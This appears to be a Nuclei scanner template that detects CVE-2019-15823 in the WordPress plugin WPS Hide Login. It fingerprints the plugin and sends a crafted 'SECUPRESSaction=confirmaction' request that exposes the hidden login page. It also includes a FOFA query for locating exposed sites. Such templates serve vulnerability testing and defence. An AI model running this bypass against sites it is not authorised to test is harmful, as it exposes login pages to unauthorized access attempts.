id: CVE-2019-15823

info:
  name: WPS Hide Login <= 1.5.2.2  - Login Page Bypass
  author: pussycat0x
  severity: high
  description: |
    WPS-Hide-Login plugin before 1.5.3 for WordPress contains an action=confirmaction protection bypass, letting attackers bypass security checks, exploit requires sending crafted requests.
  impact: |
    Attackers can bypass login protection, potentially leading to unauthorized access.
  remediation: |
    Update to version 1.5.3 or later.
  reference:
    - https://web.archive.org/web/20230601185557/https://secupress.me/blog/wps-hide-login-v1-5-2-2-multiples-vulnerabilities/
    - https://web.archive.org/web/20230711062924/https://wpscan.com/vulnerability/9469/
  metadata:
    max-request: 2
    verified: true
    fofa-query: body="/wp-content/plugins/wps-hide-login"
    vendor: wpserveur
    product: wps-hide-login
  tags: cve,cve2019,wordpress,wp-plugin,wp,disclosure,wps-hide-login,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    matchers:
      - type: word
        part: response
        words:
          - "wps-hide"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?SECUPRESSaction=confirmaction"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Username or Email Address</label>')"
          - "contains(body, 'wp-login-lost-password')"
        condition: and
# digest: 4a0a00473045022033aa8639fd9469a32da2ea8b728901eedb80aa49c641c417cf96d67cde737935022100f4d530c2b89ce82d52b09f24863a826c6ac4bbc8916cf2f7001e199306276607:922c64590222798bb761d5b6d8e72950